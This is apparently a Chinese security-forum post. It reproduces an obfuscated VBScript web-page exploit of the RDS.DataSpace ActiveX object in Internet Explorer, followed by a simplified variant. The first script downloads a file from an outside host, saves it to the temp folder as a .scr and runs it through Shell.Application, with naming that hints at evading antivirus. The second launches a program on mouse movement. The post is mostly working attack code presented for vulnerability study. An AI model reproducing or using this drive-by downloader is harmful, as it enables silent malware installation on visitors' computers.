只适合处学漏洞者看．

原ＶＢＳ混沌过
<script language="VBScript">
1
2 on error resume next
／／木马top.css
3 justurl = "http://wm.eo2q.cn/root/top.css"
4 eeeeee="cls"+"i"+"d:B"+""+""+"D96"
5 qq3222933="obj"+"ect"
6 easl="C556-65A3-"
7 just2="classid"
8 wertxxx=eeeeee & easl &"11D0-983A-00C04FC29E36"
9 just3="Micr"+"osoft.XMLHTTP"
10 just4="Shell.App"+"lication"
11 just5="Scrip"+"ting.File"+"SystemObject"
12 Set rootealsi = document.createElement(qq3222933)
13    sub usicecod(just4,rootjust)
14     set justendif = rootealsi.createobject(just4,"")
15    justendif.ShellExEcutE rootkit,"","","open",0
16     end sub
17 rootealsi.setAttribute just2, wertxxx
18 chilam=just3
19 Set xiaozi = rootealsi.CreateObject(chilam,"")
20 User="andhi"
21 justxxxx="eam"
22 justxxx="Str"
23 justxx="Adodb."
24 queryeset = justxx & justxxx & justxxxx
25 fuckavast = queryeset
26 set justav360 = rootealsi.createobject(fuckavast,"")
27 justav360.type = 1
28 fuckavavav="GET"
29 xiaozi.Open fuckavavav, justurl, False
30 xiaozi.Send
31 rootkit="justju.sCr"
32 SeT shaduav = rootealsi.createobject(just5,"")
33 sET justendif = shaduav.GetSpecialFolder(2)
34 justav360.open
35 rootkit= shaduav.BuildPath(justendif,rootkit)
36 justav360.write xiaozi.responseBody
37 justav360.savetofile rootkit,2
38 justav360.close
39 call usicecod(just4,rootjust)
40
</script>

新ＶＢＳ

<HTML>
<HEAD><TITLE>Report mouse moves</TITLE>
<SCRIPT LANGUAGE="VBScript">
sub reportMove()
   set virusobj = document.createElement("object")

//RDS.DataSpace 漏洞利用点很有意思（Element－＞变为一ＲＤＳＯＢＪ）
   virusobj.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
   set run = virusobj.createObject("Shell.Application","")
   run.ShellExecute "iexplore.exe","","","open",1
end sub
</SCRIPT>
<BODY onmousemove="reportMove()">
<H1>Welcome!</H1>
</BODY>
</HTML>

打过补定的ＩＥ会报意外错误．真正的漏洞触发点还没研究过．

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课